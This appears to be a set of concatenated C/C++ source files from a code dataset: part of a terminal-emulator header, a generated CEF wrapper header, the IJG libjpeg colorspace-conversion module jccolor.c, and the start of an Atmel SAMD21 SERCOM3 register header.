   const char *sel_str;         /* current selection as a string */
   Eina_List *cur_chids;
   Ecore_Job *sel_reset_job;
   double set_sel_at;
   Elm_Sel_Type sel_type;
   /* One-bit state flags. */
   unsigned char jump_on_change : 1;
   unsigned char jump_on_keypress : 1;
   unsigned char have_sel : 1;
   unsigned char noreqsize : 1;
   unsigned char didclick : 1;
   unsigned char moved : 1;
   unsigned char bottom_right : 1;
   unsigned char top_left : 1;
   unsigned char reset_sel : 1;
   unsigned char cb_added : 1;
   double gesture_zoom_start_size;
};

/* Snapshot of keyboard modifier state accompanying an input event. */
typedef struct _Termio_Modifiers Termio_Modifiers;
struct _Termio_Modifiers
{
   unsigned char alt : 1;
   unsigned char shift : 1;
   unsigned char ctrl : 1;
   unsigned char super : 1;
   unsigned char meta : 1;
   unsigned char hyper : 1;
   unsigned char iso_level3_shift : 1;
   unsigned char altgr : 1;
};

/* Swap two int lvalues.  Arguments are evaluated more than once, so do
 * not pass expressions with side effects. */
#define INT_SWAP(_a, _b) do { \
    int _swap = _a; _a = _b; _b = _swap; \
   } while (0)

/* Input-event entry points. */
void
termio_internal_mouse_down(Termio *sd,
                           Evas_Event_Mouse_Down *ev,
                           Termio_Modifiers modifiers);
void
termio_internal_mouse_up(Termio *sd,
                         Evas_Event_Mouse_Up *ev,
                         Termio_Modifiers modifiers);
void
termio_internal_mouse_move(Termio *sd,
                           Evas_Event_Mouse_Move *ev,
                           Termio_Modifiers modifiers);
void
termio_internal_mouse_wheel(Termio *sd,
                            Evas_Event_Mouse_Wheel *ev,
                            Termio_Modifiers modifiers);

/* Selection helpers. */
void
termio_selection_dbl_fix(Termio *sd);
void
termio_selection_get(Termio *sd,
                     int c1x, int c1y, int c2x, int c2y,
                     struct ty_sb *sb,
                     Eina_Bool rtrim);
void
termio_scroll(Evas_Object *obj, int direction,
              int start_y, int end_y);
void
termio_cursor_to_xy(Termio *sd, Evas_Coord x, Evas_Coord y,
                    int *cx, int *cy);
void
termio_internal_render(Termio *sd,
                       Evas_Coord ox, Evas_Coord oy,
                       int *preedit_xp, int *preedit_yp);
const char *
termio_internal_get_selection(Termio *sd, size_t *lenp);

#endif
{ "language": "C" }
// Copyright (c) 2016 The Chromium Embedded Framework Authors. All rights // reserved. Use of this source code is governed by a BSD-style license that // can be found in the LICENSE file. // // --------------------------------------------------------------------------- // // This file was generated by the CEF translator tool. If making changes by // hand only do so within the body of existing method and function // implementations. See the translator.README.txt file in the tools directory // for more information. // #ifndef CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_ #define CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_ #pragma once #ifndef USING_CEF_SHARED #pragma message("Warning: "__FILE__" may be accessed wrapper-side only") #else // USING_CEF_SHARED #include "include/cef_request_context_handler.h" #include "include/capi/cef_request_context_handler_capi.h" #include "libcef_dll/cpptoc/cpptoc.h" // Wrap a C++ class with a C structure. // This class may be instantiated and accessed wrapper-side only. class CefRequestContextHandlerCppToC : public CefCppToC<CefRequestContextHandlerCppToC, CefRequestContextHandler, cef_request_context_handler_t> { public: CefRequestContextHandlerCppToC(); }; #endif // USING_CEF_SHARED #endif // CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_
{ "language": "C" }
/*
 * jccolor.c
 *
 * Copyright (C) 1991-1996, Thomas G. Lane.
 * Modified 2011-2013 by Guido Vollbeding.
 * This file is part of the Independent JPEG Group's software.
 * For conditions of distribution and use, see the accompanying README file.
 *
 * This file contains input colorspace conversion routines.
 */

#define JPEG_INTERNALS
#include "jinclude.h"
#include "jpeglib.h"


/* Private subobject */

typedef struct {
  struct jpeg_color_converter pub; /* public fields */

  /* Private state for RGB->YCC conversion */
  INT32 * rgb_ycc_tab;		/* => table for RGB to YCbCr conversion */
} my_color_converter;

typedef my_color_converter * my_cconvert_ptr;


/**************** RGB -> YCbCr conversion: most common case **************/

/*
 * YCbCr is defined per Recommendation ITU-R BT.601-7 (03/2011),
 * previously known as Recommendation CCIR 601-1, except that Cb and Cr
 * are normalized to the range 0..MAXJSAMPLE rather than -0.5 .. 0.5.
 * sRGB (standard RGB color space) is defined per IEC 61966-2-1:1999.
 * sYCC (standard luma-chroma-chroma color space with extended gamut)
 * is defined per IEC 61966-2-1:1999 Amendment A1:2003 Annex F.
 * bg-sRGB and bg-sYCC (big gamut standard color spaces)
 * are defined per IEC 61966-2-1:1999 Amendment A1:2003 Annex G.
 * Note that the derived conversion coefficients given in some of these
 * documents are imprecise.  The general conversion equations are
 *	Y  = Kr * R + (1 - Kr - Kb) * G + Kb * B
 *	Cb = 0.5 * (B - Y) / (1 - Kb)
 *	Cr = 0.5 * (R - Y) / (1 - Kr)
 * With Kr = 0.299 and Kb = 0.114 (derived according to SMPTE RP 177-1993
 * from the 1953 FCC NTSC primaries and CIE Illuminant C),
 * the conversion equations to be implemented are therefore
 *	Y  =  0.299 * R + 0.587 * G + 0.114 * B
 *	Cb = -0.168735892 * R - 0.331264108 * G + 0.5 * B + CENTERJSAMPLE
 *	Cr =  0.5 * R - 0.418687589 * G - 0.081312411 * B + CENTERJSAMPLE
 * Note: older versions of the IJG code used a zero offset of MAXJSAMPLE/2,
 * rather than CENTERJSAMPLE, for Cb and Cr.  This gave equal positive and
 * negative swings for Cb/Cr, but meant that grayscale values (Cb=Cr=0)
 * were not represented exactly.  Now we sacrifice exact representation of
 * maximum red and maximum blue in order to get exact grayscales.
 *
 * To avoid floating-point arithmetic, we represent the fractional constants
 * as integers scaled up by 2^16 (about 4 digits precision); we have to divide
 * the products by 2^16, with appropriate rounding, to get the correct answer.
 *
 * For even more speed, we avoid doing any multiplications in the inner loop
 * by precalculating the constants times R,G,B for all possible values.
 * For 8-bit JSAMPLEs this is very reasonable (only 256 entries per table);
 * for 9-bit to 12-bit samples it is still acceptable.  It's not very
 * reasonable for 16-bit samples, but if you want lossless storage you
 * shouldn't be changing colorspace anyway.
 * The CENTERJSAMPLE offsets and the rounding fudge-factor of 0.5 are included
 * in the tables to save adding them separately in the inner loop.
 */

#define SCALEBITS	16	/* speediest right-shift on some machines */
#define CBCR_OFFSET	((INT32) CENTERJSAMPLE << SCALEBITS)
#define ONE_HALF	((INT32) 1 << (SCALEBITS-1))
#define FIX(x)		((INT32) ((x) * (1L<<SCALEBITS) + 0.5))

/* We allocate one big table and divide it up into eight parts, instead of
 * doing eight alloc_small requests.  This lets us use a single table base
 * address, which can be held in a register in the inner loops on many
 * machines (more than can hold all eight addresses, anyway).
 */

#define R_Y_OFF		0			/* offset to R => Y section */
#define G_Y_OFF		(1*(MAXJSAMPLE+1))	/* offset to G => Y section */
#define B_Y_OFF		(2*(MAXJSAMPLE+1))	/* etc. */
#define R_CB_OFF	(3*(MAXJSAMPLE+1))
#define G_CB_OFF	(4*(MAXJSAMPLE+1))
#define B_CB_OFF	(5*(MAXJSAMPLE+1))
#define R_CR_OFF	B_CB_OFF		/* B=>Cb, R=>Cr are the same */
#define G_CR_OFF	(6*(MAXJSAMPLE+1))
#define B_CR_OFF	(7*(MAXJSAMPLE+1))
#define TABLE_SIZE	(8*(MAXJSAMPLE+1))


/*
 * Initialize for RGB->YCC colorspace conversion.
 * Builds the eight per-component lookup tables described above.
 */

METHODDEF(void)
rgb_ycc_start (j_compress_ptr cinfo)
{
  my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert;
  INT32 * rgb_ycc_tab;
  INT32 i;

  /* Allocate and fill in the conversion tables. */
  cconvert->rgb_ycc_tab = rgb_ycc_tab = (INT32 *)
    (*cinfo->mem->alloc_small) ((j_common_ptr) cinfo, JPOOL_IMAGE,
				(TABLE_SIZE * SIZEOF(INT32)));

  for (i = 0; i <= MAXJSAMPLE; i++) {
    rgb_ycc_tab[i+R_Y_OFF] = FIX(0.299) * i;
    rgb_ycc_tab[i+G_Y_OFF] = FIX(0.587) * i;
    rgb_ycc_tab[i+B_Y_OFF] = FIX(0.114) * i     + ONE_HALF;
    rgb_ycc_tab[i+R_CB_OFF] = (-FIX(0.168735892)) * i;
    rgb_ycc_tab[i+G_CB_OFF] = (-FIX(0.331264108)) * i;
    /* We use a rounding fudge-factor of 0.5-epsilon for Cb and Cr.
     * This ensures that the maximum output will round to MAXJSAMPLE
     * not MAXJSAMPLE+1, and thus that we don't have to range-limit.
     */
    rgb_ycc_tab[i+B_CB_OFF] = FIX(0.5) * i    + CBCR_OFFSET + ONE_HALF-1;
    /*  B=>Cb and R=>Cr tables are the same
    rgb_ycc_tab[i+R_CR_OFF] = FIX(0.5) * i    + CBCR_OFFSET + ONE_HALF-1;
    */
    rgb_ycc_tab[i+G_CR_OFF] = (-FIX(0.418687589)) * i;
    rgb_ycc_tab[i+B_CR_OFF] = (-FIX(0.081312411)) * i;
  }
}


/*
 * Convert some rows of samples to the JPEG colorspace.
 *
 * Note that we change from the application's interleaved-pixel format
 * to our internal noninterleaved, one-plane-per-component format.
 * The input buffer is therefore three times as wide as the output buffer.
 *
 * A starting row offset is provided only for the output buffer.  The caller
 * can easily adjust the passed input_buf value to accommodate any row
 * offset required on that side.
*/ METHODDEF(void) rgb_ycc_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; register INT32 * ctab = cconvert->rgb_ycc_tab; register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr0, outptr1, outptr2; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr0 = output_buf[0][output_row]; outptr1 = output_buf[1][output_row]; outptr2 = output_buf[2][output_row]; output_row++; for (col = 0; col < num_cols; col++) { r = GETJSAMPLE(inptr[RGB_RED]); g = GETJSAMPLE(inptr[RGB_GREEN]); b = GETJSAMPLE(inptr[RGB_BLUE]); /* If the inputs are 0..MAXJSAMPLE, the outputs of these equations * must be too; we do not need an explicit range-limiting operation. * Hence the value being shifted is never negative, and we don't * need the general RIGHT_SHIFT macro. */ /* Y */ outptr0[col] = (JSAMPLE) ((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF]) >> SCALEBITS); /* Cb */ outptr1[col] = (JSAMPLE) ((ctab[r+R_CB_OFF] + ctab[g+G_CB_OFF] + ctab[b+B_CB_OFF]) >> SCALEBITS); /* Cr */ outptr2[col] = (JSAMPLE) ((ctab[r+R_CR_OFF] + ctab[g+G_CR_OFF] + ctab[b+B_CR_OFF]) >> SCALEBITS); inptr += RGB_PIXELSIZE; } } } /**************** Cases other than RGB -> YCbCr **************/ /* * Convert some rows of samples to the JPEG colorspace. * This version handles RGB->grayscale conversion, which is the same * as the RGB->Y portion of RGB->YCbCr. * We assume rgb_ycc_start has been called (we only use the Y tables). 
*/ METHODDEF(void) rgb_gray_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; register INT32 * ctab = cconvert->rgb_ycc_tab; register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr = output_buf[0][output_row++]; for (col = 0; col < num_cols; col++) { r = GETJSAMPLE(inptr[RGB_RED]); g = GETJSAMPLE(inptr[RGB_GREEN]); b = GETJSAMPLE(inptr[RGB_BLUE]); /* Y */ outptr[col] = (JSAMPLE) ((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF]) >> SCALEBITS); inptr += RGB_PIXELSIZE; } } } /* * Convert some rows of samples to the JPEG colorspace. * This version handles Adobe-style CMYK->YCCK conversion, * where we convert R=1-C, G=1-M, and B=1-Y to YCbCr using the same * conversion as above, while passing K (black) unchanged. * We assume rgb_ycc_start has been called. 
 */

METHODDEF(void)
cmyk_ycck_convert (j_compress_ptr cinfo,
		   JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
		   JDIMENSION output_row, int num_rows)
{
  my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert;
  register INT32 * ctab = cconvert->rgb_ycc_tab;
  register int r, g, b;
  register JSAMPROW inptr;
  register JSAMPROW outptr0, outptr1, outptr2, outptr3;
  register JDIMENSION col;
  JDIMENSION num_cols = cinfo->image_width;

  while (--num_rows >= 0) {
    inptr = *input_buf++;
    outptr0 = output_buf[0][output_row];
    outptr1 = output_buf[1][output_row];
    outptr2 = output_buf[2][output_row];
    outptr3 = output_buf[3][output_row];
    output_row++;
    for (col = 0; col < num_cols; col++) {
      /* Complement C/M/Y to get the equivalent R/G/B values. */
      r = MAXJSAMPLE - GETJSAMPLE(inptr[0]);
      g = MAXJSAMPLE - GETJSAMPLE(inptr[1]);
      b = MAXJSAMPLE - GETJSAMPLE(inptr[2]);
      /* K passes through as-is */
      outptr3[col] = inptr[3];	/* don't need GETJSAMPLE here */
      /* If the inputs are 0..MAXJSAMPLE, the outputs of these equations
       * must be too; we do not need an explicit range-limiting operation.
       * Hence the value being shifted is never negative, and we don't
       * need the general RIGHT_SHIFT macro.
       */
      /* Y */
      outptr0[col] = (JSAMPLE)
	((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF])
	 >> SCALEBITS);
      /* Cb */
      outptr1[col] = (JSAMPLE)
	((ctab[r+R_CB_OFF] + ctab[g+G_CB_OFF] + ctab[b+B_CB_OFF])
	 >> SCALEBITS);
      /* Cr */
      outptr2[col] = (JSAMPLE)
	((ctab[r+R_CR_OFF] + ctab[g+G_CR_OFF] + ctab[b+B_CR_OFF])
	 >> SCALEBITS);
      inptr += 4;		/* advance one CMYK pixel */
    }
  }
}


/*
 * Convert some rows of samples to the JPEG colorspace.
 * [R,G,B] to [R-G,G,B-G] conversion with modulo calculation
 * (forward reversible color transform).
 * This can be seen as an adaption of the general RGB->YCbCr
 * conversion equation with Kr = Kb = 0, while replacing the
 * normalization by modulo calculation.
 */

METHODDEF(void)
rgb_rgb1_convert (j_compress_ptr cinfo,
		  JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
		  JDIMENSION output_row, int num_rows)
{
  register int r, g, b;
  register JSAMPROW inptr;
  register JSAMPROW outptr0, outptr1, outptr2;
  register JDIMENSION col;
  JDIMENSION num_cols = cinfo->image_width;

  while (--num_rows >= 0) {
    inptr = *input_buf++;
    outptr0 = output_buf[0][output_row];
    outptr1 = output_buf[1][output_row];
    outptr2 = output_buf[2][output_row];
    output_row++;
    for (col = 0; col < num_cols; col++) {
      r = GETJSAMPLE(inptr[RGB_RED]);
      g = GETJSAMPLE(inptr[RGB_GREEN]);
      b = GETJSAMPLE(inptr[RGB_BLUE]);
      /* Assume that MAXJSAMPLE+1 is a power of 2, so that the MOD
       * (modulo) operator is equivalent to the bitmask operator AND.
       */
      outptr0[col] = (JSAMPLE) ((r - g + CENTERJSAMPLE) & MAXJSAMPLE);
      outptr1[col] = (JSAMPLE) g;	/* G passes through unchanged */
      outptr2[col] = (JSAMPLE) ((b - g + CENTERJSAMPLE) & MAXJSAMPLE);
      inptr += RGB_PIXELSIZE;
    }
  }
}


/*
 * Convert some rows of samples to the JPEG colorspace.
 * This version handles grayscale output with no conversion.
 * The source can be either plain grayscale or YCC (since Y == gray).
 */

METHODDEF(void)
grayscale_convert (j_compress_ptr cinfo,
		   JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
		   JDIMENSION output_row, int num_rows)
{
  /* instride skips over the chroma components of YCC input, if any. */
  int instride = cinfo->input_components;
  register JSAMPROW inptr;
  register JSAMPROW outptr;
  register JDIMENSION col;
  JDIMENSION num_cols = cinfo->image_width;

  while (--num_rows >= 0) {
    inptr = *input_buf++;
    outptr = output_buf[0][output_row++];
    for (col = 0; col < num_cols; col++) {
      outptr[col] = inptr[0];	/* don't need GETJSAMPLE() here */
      inptr += instride;
    }
  }
}


/*
 * Convert some rows of samples to the JPEG colorspace.
 * No colorspace conversion, but change from interleaved
 * to separate-planes representation.
 */

METHODDEF(void)
rgb_convert (j_compress_ptr cinfo,
	     JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
	     JDIMENSION output_row, int num_rows)
{
  register JSAMPROW inptr;
  register JSAMPROW outptr0, outptr1, outptr2;
  register JDIMENSION col;
  JDIMENSION num_cols = cinfo->image_width;

  while (--num_rows >= 0) {
    inptr = *input_buf++;
    outptr0 = output_buf[0][output_row];
    outptr1 = output_buf[1][output_row];
    outptr2 = output_buf[2][output_row];
    output_row++;
    for (col = 0; col < num_cols; col++) {
      /* We can dispense with GETJSAMPLE() here */
      outptr0[col] = inptr[RGB_RED];
      outptr1[col] = inptr[RGB_GREEN];
      outptr2[col] = inptr[RGB_BLUE];
      inptr += RGB_PIXELSIZE;
    }
  }
}


/*
 * Convert some rows of samples to the JPEG colorspace.
 * This version handles multi-component colorspaces without conversion.
 * We assume input_components == num_components.
 */

METHODDEF(void)
null_convert (j_compress_ptr cinfo,
	      JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
	      JDIMENSION output_row, int num_rows)
{
  int ci;
  register int nc = cinfo->num_components;
  register JSAMPROW inptr;
  register JSAMPROW outptr;
  register JDIMENSION col;
  JDIMENSION num_cols = cinfo->image_width;

  while (--num_rows >= 0) {
    /* It seems fastest to make a separate pass for each component. */
    for (ci = 0; ci < nc; ci++) {
      inptr = input_buf[0] + ci;
      outptr = output_buf[ci][output_row];
      for (col = 0; col < num_cols; col++) {
	*outptr++ = *inptr;	/* don't need GETJSAMPLE() here */
	inptr += nc;
      }
    }
    input_buf++;
    output_row++;
  }
}


/*
 * Empty method for start_pass.
 * Used by all conversions that need no per-pass initialization.
 */

METHODDEF(void)
null_method (j_compress_ptr cinfo)
{
  /* no work needed */
}


/*
 * Module initialization routine for input colorspace conversion.
 */

GLOBAL(void)
jinit_color_converter (j_compress_ptr cinfo)
{
  my_cconvert_ptr cconvert;

  /* Allocate the converter in image-lifetime pool and publish it. */
  cconvert = (my_cconvert_ptr)
    (*cinfo->mem->alloc_small) ((j_common_ptr) cinfo, JPOOL_IMAGE,
                                SIZEOF(my_color_converter));
  cinfo->cconvert = &cconvert->pub;
  /* set start_pass to null method until we find out differently */
  cconvert->pub.start_pass = null_method;

  /* Make sure input_components agrees with in_color_space */
  switch (cinfo->in_color_space) {
  case JCS_GRAYSCALE:
    if (cinfo->input_components != 1)
      ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
    break;

  case JCS_RGB:
  case JCS_BG_RGB:
    if (cinfo->input_components != RGB_PIXELSIZE)
      ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
    break;

  case JCS_YCbCr:
  case JCS_BG_YCC:
    if (cinfo->input_components != 3)
      ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
    break;

  case JCS_CMYK:
  case JCS_YCCK:
    if (cinfo->input_components != 4)
      ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
    break;

  default:			/* JCS_UNKNOWN can be anything */
    if (cinfo->input_components < 1)
      ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
    break;
  }

  /* Support color transform only for RGB colorspaces */
  if (cinfo->color_transform &&
      cinfo->jpeg_color_space != JCS_RGB &&
      cinfo->jpeg_color_space != JCS_BG_RGB)
    ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);

  /* Check num_components, set conversion method based on requested space */
  switch (cinfo->jpeg_color_space) {
  case JCS_GRAYSCALE:
    if (cinfo->num_components != 1)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    switch (cinfo->in_color_space) {
    case JCS_GRAYSCALE:
    case JCS_YCbCr:
    case JCS_BG_YCC:
      /* Y channel of YCC is already gray; plain copy suffices. */
      cconvert->pub.color_convert = grayscale_convert;
      break;
    case JCS_RGB:
      cconvert->pub.start_pass = rgb_ycc_start;
      cconvert->pub.color_convert = rgb_gray_convert;
      break;
    default:
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    }
    break;

  case JCS_RGB:
  case JCS_BG_RGB:
    if (cinfo->num_components != 3)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    if (cinfo->in_color_space == cinfo->jpeg_color_space) {
      switch (cinfo->color_transform) {
      case JCT_NONE:
	cconvert->pub.color_convert = rgb_convert;
	break;
      case JCT_SUBTRACT_GREEN:
	/* Reversible lossless color transform (R-G, G, B-G). */
	cconvert->pub.color_convert = rgb_rgb1_convert;
	break;
      default:
	ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
      }
    } else
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    break;

  case JCS_YCbCr:
    if (cinfo->num_components != 3)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    switch (cinfo->in_color_space) {
    case JCS_RGB:
      cconvert->pub.start_pass = rgb_ycc_start;
      cconvert->pub.color_convert = rgb_ycc_convert;
      break;
    case JCS_YCbCr:
      cconvert->pub.color_convert = null_convert;
      break;
    default:
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    }
    break;

  case JCS_BG_YCC:
    if (cinfo->num_components != 3)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    switch (cinfo->in_color_space) {
    case JCS_RGB:
      /* For conversion from normal RGB input to BG_YCC representation,
       * the Cb/Cr values are first computed as usual, and then
       * quantized further after DCT processing by a factor of
       * 2 in reference to the nominal quantization factor.
       */
      /* need quantization scale by factor of 2 after DCT */
      cinfo->comp_info[1].component_needed = TRUE;
      cinfo->comp_info[2].component_needed = TRUE;
      /* compute normal YCC first */
      cconvert->pub.start_pass = rgb_ycc_start;
      cconvert->pub.color_convert = rgb_ycc_convert;
      break;
    case JCS_YCbCr:
      /* need quantization scale by factor of 2 after DCT */
      cinfo->comp_info[1].component_needed = TRUE;
      cinfo->comp_info[2].component_needed = TRUE;
      /*FALLTHROUGH*/
    case JCS_BG_YCC:
      /* Pass through for BG_YCC input */
      cconvert->pub.color_convert = null_convert;
      break;
    default:
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    }
    break;

  case JCS_CMYK:
    if (cinfo->num_components != 4)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    if (cinfo->in_color_space == JCS_CMYK)
      cconvert->pub.color_convert = null_convert;
    else
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    break;

  case JCS_YCCK:
    if (cinfo->num_components != 4)
      ERREXIT(cinfo, JERR_BAD_J_COLORSPACE);
    switch (cinfo->in_color_space) {
    case JCS_CMYK:
      /* rgb_ycc_start builds the same tables used by cmyk->ycck. */
      cconvert->pub.start_pass = rgb_ycc_start;
      cconvert->pub.color_convert = cmyk_ycck_convert;
      break;
    case JCS_YCCK:
      cconvert->pub.color_convert = null_convert;
      break;
    default:
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    }
    break;

  default:			/* allow null conversion of JCS_UNKNOWN */
    if (cinfo->jpeg_color_space != cinfo->in_color_space ||
	cinfo->num_components != cinfo->input_components)
      ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL);
    cconvert->pub.color_convert = null_convert;
    break;
  }
}
{ "language": "C" }
/**
 * \file
 *
 * \brief Instance description for SERCOM3
 *
 * Copyright (c) 2016 Atmel Corporation,
 *                    a wholly owned subsidiary of Microchip Technology Inc.
 *
 * \asf_license_start
 *
 * \page License
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the Licence at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * \asf_license_stop
 *
 */

#ifndef _SAMD21_SERCOM3_INSTANCE_
#define _SAMD21_SERCOM3_INSTANCE_

/* ========== Register definition for SERCOM3 peripheral ========== */
/* SERCOM3 is a multi-mode serial engine at base 0x42001400; the I2CM, I2CS,
 * SPI and USART register sets below are alternate views of the same
 * peripheral, so overlapping addresses between the groups are intentional.
 */
#if (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__))
/* Assembler view: plain addresses, no C dereference. */
/* ----- I2C master mode ----- */
#define REG_SERCOM3_I2CM_CTRLA     (0x42001400) /**< \brief (SERCOM3) I2CM Control A */
#define REG_SERCOM3_I2CM_CTRLB     (0x42001404) /**< \brief (SERCOM3) I2CM Control B */
#define REG_SERCOM3_I2CM_BAUD      (0x4200140C) /**< \brief (SERCOM3) I2CM Baud Rate */
#define REG_SERCOM3_I2CM_INTENCLR  (0x42001414) /**< \brief (SERCOM3) I2CM Interrupt Enable Clear */
#define REG_SERCOM3_I2CM_INTENSET  (0x42001416) /**< \brief (SERCOM3) I2CM Interrupt Enable Set */
#define REG_SERCOM3_I2CM_INTFLAG   (0x42001418) /**< \brief (SERCOM3) I2CM Interrupt Flag Status and Clear */
#define REG_SERCOM3_I2CM_STATUS    (0x4200141A) /**< \brief (SERCOM3) I2CM Status */
#define REG_SERCOM3_I2CM_SYNCBUSY  (0x4200141C) /**< \brief (SERCOM3) I2CM Synchronization Busy */
#define REG_SERCOM3_I2CM_ADDR      (0x42001424) /**< \brief (SERCOM3) I2CM Address */
#define REG_SERCOM3_I2CM_DATA      (0x42001428) /**< \brief (SERCOM3) I2CM Data */
#define REG_SERCOM3_I2CM_DBGCTRL   (0x42001430) /**< \brief (SERCOM3) I2CM Debug Control */
/* ----- I2C slave mode ----- */
#define REG_SERCOM3_I2CS_CTRLA     (0x42001400) /**< \brief (SERCOM3) I2CS Control A */
#define REG_SERCOM3_I2CS_CTRLB     (0x42001404) /**< \brief (SERCOM3) I2CS Control B */
#define REG_SERCOM3_I2CS_INTENCLR  (0x42001414) /**< \brief (SERCOM3) I2CS Interrupt Enable Clear */
#define REG_SERCOM3_I2CS_INTENSET  (0x42001416) /**< \brief (SERCOM3) I2CS Interrupt Enable Set */
#define REG_SERCOM3_I2CS_INTFLAG   (0x42001418) /**< \brief (SERCOM3) I2CS Interrupt Flag Status and Clear */
#define REG_SERCOM3_I2CS_STATUS    (0x4200141A) /**< \brief (SERCOM3) I2CS Status */
#define REG_SERCOM3_I2CS_SYNCBUSY  (0x4200141C) /**< \brief (SERCOM3) I2CS Synchronization Busy */
#define REG_SERCOM3_I2CS_ADDR      (0x42001424) /**< \brief (SERCOM3) I2CS Address */
#define REG_SERCOM3_I2CS_DATA      (0x42001428) /**< \brief (SERCOM3) I2CS Data */
/* ----- SPI mode ----- */
#define REG_SERCOM3_SPI_CTRLA      (0x42001400) /**< \brief (SERCOM3) SPI Control A */
#define REG_SERCOM3_SPI_CTRLB      (0x42001404) /**< \brief (SERCOM3) SPI Control B */
#define REG_SERCOM3_SPI_BAUD       (0x4200140C) /**< \brief (SERCOM3) SPI Baud Rate */
#define REG_SERCOM3_SPI_INTENCLR   (0x42001414) /**< \brief (SERCOM3) SPI Interrupt Enable Clear */
#define REG_SERCOM3_SPI_INTENSET   (0x42001416) /**< \brief (SERCOM3) SPI Interrupt Enable Set */
#define REG_SERCOM3_SPI_INTFLAG    (0x42001418) /**< \brief (SERCOM3) SPI Interrupt Flag Status and Clear */
#define REG_SERCOM3_SPI_STATUS     (0x4200141A) /**< \brief (SERCOM3) SPI Status */
#define REG_SERCOM3_SPI_SYNCBUSY   (0x4200141C) /**< \brief (SERCOM3) SPI Synchronization Busy */
#define REG_SERCOM3_SPI_ADDR       (0x42001424) /**< \brief (SERCOM3) SPI Address */
#define REG_SERCOM3_SPI_DATA       (0x42001428) /**< \brief (SERCOM3) SPI Data */
#define REG_SERCOM3_SPI_DBGCTRL    (0x42001430) /**< \brief (SERCOM3) SPI Debug Control */
/* ----- USART mode ----- */
#define REG_SERCOM3_USART_CTRLA    (0x42001400) /**< \brief (SERCOM3) USART Control A */
#define REG_SERCOM3_USART_CTRLB    (0x42001404) /**< \brief (SERCOM3) USART Control B */
#define REG_SERCOM3_USART_BAUD     (0x4200140C) /**< \brief (SERCOM3) USART Baud Rate */
#define REG_SERCOM3_USART_RXPL     (0x4200140E) /**< \brief (SERCOM3) USART Receive Pulse Length */
#define REG_SERCOM3_USART_INTENCLR (0x42001414) /**< \brief (SERCOM3) USART Interrupt Enable Clear */
#define REG_SERCOM3_USART_INTENSET (0x42001416) /**< \brief (SERCOM3) USART Interrupt Enable Set */
#define REG_SERCOM3_USART_INTFLAG  (0x42001418) /**< \brief (SERCOM3) USART Interrupt Flag Status and Clear */
#define REG_SERCOM3_USART_STATUS   (0x4200141A) /**< \brief (SERCOM3) USART Status */
#define REG_SERCOM3_USART_SYNCBUSY (0x4200141C) /**< \brief (SERCOM3) USART Synchronization Busy */
#define REG_SERCOM3_USART_DATA     (0x42001428) /**< \brief (SERCOM3) USART Data */
#define REG_SERCOM3_USART_DBGCTRL  (0x42001430) /**< \brief (SERCOM3) USART Debug Control */
#else
/* C view: typed dereferences (RwReg=32-bit r/w, RwReg16/RwReg8 narrower,
 * RoReg read-only). */
/* ----- I2C master mode ----- */
#define REG_SERCOM3_I2CM_CTRLA     (*(RwReg  *)0x42001400UL) /**< \brief (SERCOM3) I2CM Control A */
#define REG_SERCOM3_I2CM_CTRLB     (*(RwReg  *)0x42001404UL) /**< \brief (SERCOM3) I2CM Control B */
#define REG_SERCOM3_I2CM_BAUD      (*(RwReg  *)0x4200140CUL) /**< \brief (SERCOM3) I2CM Baud Rate */
